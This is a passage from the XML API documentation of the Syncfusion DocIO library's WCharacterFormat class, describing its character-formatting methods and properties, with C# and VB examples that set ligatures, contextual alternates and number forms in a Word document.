            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.SerializeAllData">
            <summary>
            Defines whether to serialize all data. 
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.GetComplexValue(System.Int16)">
            <summary>
            Gets complex value of Single Property Modifier Record.
            </summary>
            <param name="optionKey">The option key.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.GetComplexBoolValue(System.Int16)">
            <summary>
            Gets the complex bool value.
            </summary>
            <param name="optionKey">The option key.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.GetBaseFormat(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Gets the base format.
            </summary>
            <param name="format">The format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.RemoveChanges">
            <summary>
            Removes the format changes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.AcceptChanges">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.CheckCrossRef">
            <summary>
            Checks whether character format sprms have cross reference
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.HasSameSprms(Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Determines whether has same srms.
            </summary>
            <param name="entity">The entity.</param>
            <returns>
            	if has same srpms, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.GetCharStyle">
            <summary>
            Gets the char style.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.GetFontName(System.Int16)">
            <summary>
            Gets the name of the font.
            </summary>
            <param name="fontKey">The font key.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.UpdateDefaultFormats">
            <summary>
            Updates the default formats.
            Updates the document default formattings while cloning the document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.ContainsValue(System.Int32)">
            <summary>
            Determines whether the specified key contains value.
            </summary>
            <param name="key">The key.</param>
            <returns>
            	<c>true</c> if the specified key contains value; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.SetDefaultProperties">
            <summary>
            Sets the default properties.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.GetDefValue(System.Int32)">
            <summary>
            Returns the default values.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>An object that specifies the default value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.GetDefComposite(System.Int32)">
            <summary>
            Gets the composite values.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.WriteXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentWriter)">
            <summary>
            Writes object data as inside xml element.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.ReadXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</param>
            <returns>The value indicating the presence of xml content.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.ImportContainer(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Imports the container.
            </summary>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.ImportXmlProps(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Imports the XML properties.
            </summary>
            <param name="format">The format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.ImportMembers(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Imports the members.
            <exclude/>
            </summary>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.ClearFormatting">
            <summary>
            Clears the character formats applied
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.OnChange(Syncfusion.DocIO.DLS.FormatBase,System.Int32)">
            <summary>
            Occurs on format change.
            <exclude/>
            </summary>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</param>
            <param name="propKey">The <b>integer</b> that represents the property key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.ApplyBase(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Apply base style
            </summary>
            <param name="baseFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.UpdateUsedFontsCollection">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.UpdateComplexProperty(System.Int16,System.Boolean)">
            <summary>
            Updates the complex boolean value.
            </summary>
            <param name="format">The character format.</param>
            <param name="propKey">The property key.</param>
            <param name="val">Boolean value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.HasValue(System.Int32)">
            <summary>
            Determines whether the specified property key has value.
            </summary>
            <param name="propertyKey">The property key.</param>
            <returns>
            	if the specified property key has value, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.GetSprmOption(System.Int32)">
            <summary>
            Gets the Single Property Modifier Record option value for the specified property.
            <exclude/>
            </summary>
            <param name="propertyKey">The <b>integer</b> that represents the property key.</param>
            <returns>The <b>integer</b> that represents the SPRM value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.WriteComplexAttr(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter,System.Int32,System.String)">
            <summary>
            Writes the complex attribute.
            </summary>
            <param name="writer">The writer.</param>
            <param name="propKey">The property key.</param>
            <param name="xdlsConstant">The XDLS constant string.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.GetFontHint">
            <summary>
            Gets the font hint.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.GetFontNameFromHint">
            <summary>
            Returns font from Hint
             </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.PropToFormat(System.Int32)">
            <summary>
            Converts character property to format property.
            </summary>
            <param name="popertyKey">The property key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.UpdateLanguageId">
            <summary>
            Updates the language identifier for non far east characters.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.UpdateLanguageIdFarEast">
            <summary>
            Updates the language identifier for far east characters.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.MergeFormat(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Merges the format.
            </summary>
            <param name="destinationFormat">The destination format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.UpdateFormattings(System.Collections.Generic.Dictionary{System.Int32,System.Object})">
            <summary>
            Updates the formattings.
            </summary>
            <param name="properties">The properties.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Clones the relations for referred character style.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.UpdateFormatting(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Updates the formatting.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.UpdateSourceFormat(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Updates the source format.
            </summary>
            <param name="destBaseFormat">The dest base format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.UpdateSourceFormatting(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Updates the source formatting.
            </summary>
            <param name="format">The format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.Compare(Syncfusion.DocIO.DLS.WCharacterFormat)">
             <summary>
            Compares current character format with another character format
             </summary>
             <param name="characterFormat">The character format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.Compare(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
             <summary>
            Compares the sprms collection with another sprms collection
             </summary>
             <param name="sprms">The Simple property modifier array</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.SetKernSize(System.Single)">
            <summary>
            Sets the Kern font size
            </summary>
            <param name="value">Kern font size</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.SetPosition(System.Single)">
            <summary>
            Sets the character position
            </summary>
            <param name="value">The character position.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.SetScaling(System.Single)">
            <summary>
            Sets the scaling value
            </summary>
            <param name="value">The scaling value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.SetCharacterSpacing(System.Single)">
            <summary>
            Sets the Character spacing
            </summary>
            <param name="value">The character spacing.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.CancelOnChange">
            <summary>
            Gets or sets a value indicating whether [m_cancel on change].
            </summary>
            <value>
              <c>true</c> if [m_cancel on change]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.CrossRefChecked">
            <summary>
            Flag which defines whether character format passed test on cross
            reference. 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.Font">
            <summary>
            Gets or sets the <see cref="T:System.Drawing.Font"/> for the text.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.FontName">
            <summary>
            Gets or sets font name of the text.
            </summary>
            <value>The <b>string</b> that specifies the font name.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.BreakClear">
            <summary>
            Gets and set the clear value
            </summary> get the type of the BreakClear and set the Type for BreakClear
            <value>Clear.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.FontSize">
            <summary>
            Gets or sets the font size of the text measured in points.
            </summary>
            <value>The <b>float </b>that specifies the font size.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.Scaling">
            <summary>
            Gets or sets the scaling.
            </summary>
            <value>
            The scaling.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.ComplexScript">
            <summary>
            Gets or sets a value indicating whether the contents of the text shall be 
            treated as complex script text regardless of their Unicode character values when determining 
            the formatting for the text.
            </summary>
            <value><b>True</b> if to consider as complex script; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.Bold">
            <summary>
            Gets or sets a value indicating whether the text is formatted as bold.
            </summary>
            <value><b>True </b>if to format the text with bold style; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.Italic">
            <summary>
            Gets or sets a value indicating whether the text is formatted as italic.
            </summary>
            <value><b>True </b>if to format the text with italic style; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.Strikeout">
            <summary>
            Gets or sets a value indicating whether the text is formatted with strikethrough.
            </summary>
            <value><b>True </b>if to format the text with strike through; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.DoubleStrike">
            <summary>
            Gets or sets a value indicating whether the text is formatted with double strikethrough effect.
            </summary>
            <value><b>True </b>if to format the text with double strike through; otherwise, <b>false</b>.</value>
            <remarks>The double strike effect is not supported by Essential PDF.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.UnderlineStyle">
            <summary>
            Gets or sets the underline style for the text.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.UnderlineStyle"/> member that specifies the underline style.</value>
            <remarks>Essential PDF supports only single underline style.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.TextColor">
            <summary>
            Gets or sets the <see cref="T:System.Drawing.Color"/> for the text.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.TextBackgroundColor">
            <summary>
            Gets or sets the text background color.
            </summary>
            <remarks>The text background color is not supported by Essential PDF.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.SubSuperScript">
            <summary>
            Gets or sets the subscript or superscript for the text.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.SubSuperScript"/> member that specifies the type of SubSuperScript.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.CharacterSpacing">
            <summary>
            Gets or sets space width between the characters measured in points.
            </summary>
            <value>The <b>float </b> that specifies the width.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.Position">
            <summary>
            Gets or sets the vertical position of text measured in points.
            </summary>
            <value>The <b>float </b> that specifies the vertical position.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.LineBreak">
            <summary>
            Gets or sets line break after.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.Shadow">
            <summary>
            Gets or sets a value indicating whether the text is formatted with a shadow.
            </summary>
            <value><b>True</b> if the text has shadow; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.Emboss">
            <summary>
            Gets or sets a value indicating whether the text is embossed.
            </summary>
            <value><b>True</b> if the text is embossed; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.Engrave">
            <summary>
            Gets or sets a value indicating whether the text is engraved.
            </summary>
            <value><b>True</b> if the text is engraved; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.Hidden">
            <summary>
            Gets or sets a value indicating whether the text is formatted as hidden.
            </summary>
            <value><b>True</b> if the text is hidden; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.AllCaps">
            <summary>
            Gets or sets a value indicating whether the text characters are displayed as their capital letter equivalents.
            </summary>
            <value><b>True</b> if the text to be displayed as capital letters; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.SmallCaps">
            <summary>
            Gets or sets a value indicating whether the text characters are displayed as their capital letter equivalents, 
            in a font size that is smaller than the actual font size that is specified for this text.
            </summary>
            <value><b>True</b> if the text to be displayed as capital letters with smaller font size; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.SpecVanish">
            <summary>
            Gets or sets the value for SpecVanish property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.Bidi">
            <summary>
            Gets or sets a value indicating whether the text is formatted with right-to-left layout.
            </summary>
            <value><b>True</b> if the text is right-to-left; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.BoldBidi">
            <summary>
            Gets or sets a value indicating whether the text is formatted bold when displayed right-to-left or determined to be complex script.
            </summary>
            <value><b>True </b> if to format the right-to-left text with bold style; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.ItalicBidi">
            <summary>
            Gets or sets a value indicating whether the text is italicized when displayed right-to-left or determined to be complex script.
            </summary>
            <value><b>True </b> if to format the right-to-left text with italic style; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.FontSizeBidi">
            <summary>
            Gets or sets the size of the text(in points), for text that is displayed right-to-left or text that is a complex script.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.FontNameBidi">
            <summary>
            Gets or sets the font name for text that is displayed right-to-left or text that is a complex script.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.HighlightColor">
            <summary>
            Gets or sets highlight <see cref="T:System.Drawing.Color"/> of the text.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.Border">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.Border"/> for the text.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.FontNameAscii">
            <summary>
            Gets or sets the font used for Latin text (characters with character codes 
            from 0 through 127). 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.FontNameFarEast">
            <summary>
            Gets or sets East Asian font name.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.FontNameNonFarEast">
            <summary>
            Gets or sets font used for characters with character codes from 128 through 255.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.IdctHint">
            <summary>
            Get/set IdctHint property.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.LocaleIdASCII">
            <summary>
            Gets or sets the locale identifier(language) of the formatted characters.
            </summary>
            <value>The <b>short</b> value that specifies the ASCII locale id.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.LocaleIdFarEast">
            <summary>
            Gets or sets the the locale identifier (language) of the formatted Asian characters.
            </summary>
            <value>The <b>short</b> value that specifies the far east locale id.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.LidBi">
            <summary>
            Gets or sets the language id for right to left or complex script text.
            </summary>
            <value>
            The lid bi.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.NoProof">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.ForeColor">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.TextureStyle">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.OutLine">
            <summary>
            Gets or sets a value indicating whether only the outline contour of the characters in the text is rendered, 
            with the inside of each character left empty.
            </summary>
            <value><b>True</b> if to have the outline effect; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.Special">
            <summary>
            Gets or sets special style.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.CharStyleName">
            <summary>
            Gets the character style name that is used to format the contents of the paragraph.
            </summary>
            <value>The <b>string</b> that specifies the character style name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.NewCharStyleName">
            <summary>
            Gets or sets the new name of the character style (style name after document change).
            </summary>
            <value>The new name of the char style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.IsInsertRevision">
            <summary>
            Gets a value indicating whether this instance is inserted change.
            </summary>
            <value>
            	if this instance is inserted change, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.IsDeleteRevision">
            <summary>
            Gets a value indicating whether this instance is deleted change.
            </summary>
            <value>
            	if this instance is deleted change, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.IsChangedFormat">
            <summary>
            Gets a value indicating whether this instance has changed format.
            </summary>
            <value>
            	if this instance has changed format, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.CharacterProps">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.Sprms">
            <summary>
            Gets or sets the SPRMS.
            </summary>
            <value>The SPRMS.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.ListPictureIndex">
            <summary>
            Gets or sets the index of the list picture.
            </summary>
            <value>The index of the list picture.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.ListHasPicture">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.CharStyle">
            <summary>
            Gets the character style.
            </summary>
            <value>The character style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.FieldVanish">
            <summary>
            Gets or sets a value indicating whether field should be vanished.
            </summary>
            <value><c>true</c> if field vanish; otherwise, <c>false</c>.</value>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.FieldVanishComplex">
            <summary>
            Gets or sets the field vanish complex.
            </summary>
            <value>The field vanish complex.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.PicLocation">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.TableStyleCharacterFormat">
            <summary>
            Gets or sets the table style character format.
            </summary>
            <value>The table style character format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.UseContextualAlternates">
            <summary>
            Gets or sets a value indicating whether to use contextual alternates.
            </summary>
            <value>
            	<b>True</b> if to use contextual alternates; otherwise, <b>false</b>.
            </value>
            <example> 
            <para>The following example illustrates how to set contextual alternates for text.</para>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Add new text
                IWTextRange text = paragraph.AppendText("Text to describe contextual alternates");
                text.CharacterFormat.FontName = "Segoe Script";
                //Set contextual alternates
                text.CharacterFormat.UseContextualAlternates = true;
                paragraph = section.AddParagraph();
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add new text
                Dim text As IWTextRange = paragraph.AppendText("Text to describe contextual alternates")
                text.CharacterFormat.FontName = "Segoe Script"
                'Set contextual alternates
                text.CharacterFormat.UseContextualAlternates = True
                paragraph = section.AddParagraph()
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.Ligatures">
            <summary>
            Gets or sets the ligatures type for the text.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.LigatureType"/> member that specifies the type of ligatures.</value>
            <example> 
            <para>The following example illustrates how to set ligature types for text.</para>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Add new text
                IWTextRange text = paragraph.AppendText("Text to describe discretional ligatures");
                //Set ligature type
                text.CharacterFormat.Ligatures = LigatureType.Discretional;
                text.CharacterFormat.FontName = "Arial";
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("Text to describe contextual ligatures");
                text.CharacterFormat.Ligatures = LigatureType.Contextual;
                text.CharacterFormat.FontName = "Arial";
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("Text to describe historical ligatures");
                text.CharacterFormat.Ligatures = LigatureType.Historical;
                text.CharacterFormat.FontName = "Arial";
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add new text
                Dim text As IWTextRange = paragraph.AppendText("Text to describe discretional ligatures")
                'Set ligature type as Discretional
                text.CharacterFormat.Ligatures = LigatureType.Discretional
                text.CharacterFormat.FontName = "Arial"
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("Text to describe contextual ligatures")
                'Set ligature type as Contextual
                text.CharacterFormat.Ligatures = LigatureType.Contextual
                text.CharacterFormat.FontName = "Arial"
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("Text to describe historical ligatures")
                'Set ligature type as Historical
                text.CharacterFormat.Ligatures = LigatureType.Historical
                text.CharacterFormat.FontName = "Arial"
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.NumberForm">
            <summary>
            Gets or sets type of number form(height of the numbers present in the text) for the text.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.NumberFormType"/> member that specifies the type of number form.</value>
            <example> 
            <para>The following example illustrates how to set number form type for text.</para>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Add new text
                IWTextRange text = paragraph.AppendText("Numbers to describe oldstyle number form 0123456789");
                text.CharacterFormat.FontName = "Calibri";
                //Set number style
                text.CharacterFormat.NumberForm = NumberFormType.OldStyle;
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("Numbers to describe lining number form 0123456789");
                text.CharacterFormat.FontName = "Calibri";
                //Set number style
                text.CharacterFormat.NumberForm = NumberFormType.Lining;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add new text
                Dim text As IWTextRange = paragraph.AppendText("Numbers to describe oldstyle number form 0123456789")
                text.CharacterFormat.FontName = "Calibri"
                'Set number style
                text.CharacterFormat.NumberForm = NumberFormType.OldStyle
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("Numbers to describe lining number form 0123456789")
                text.CharacterFormat.FontName = "Calibri"
                'Set number style
                text.CharacterFormat.NumberForm = NumberFormType.Lining
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.NumberSpacing">
            <summary>
            Gets or sets the type of number spacing(spacing between numbers in text) for the text.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.NumberSpacingType"/> member that specifies the type of number spacing.</value>
            <example> 
            <para>The following example illustrates how to set number spacing for text.</para>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Add new text
                IWTextRange text = paragraph.AppendText("Numbers to describe tabular number spacing 0123456789");
                text.CharacterFormat.FontName = "Calibri";
                //Set number spacing
                text.CharacterFormat.NumberSpacing = NumberSpacingType.Tabular;
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("Numbers to describe proportional number spacing 0123456789");
                text.CharacterFormat.FontName = "Calibri";
                //Set number spacing
                text.CharacterFormat.NumberSpacing = NumberSpacingType.Proportional;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
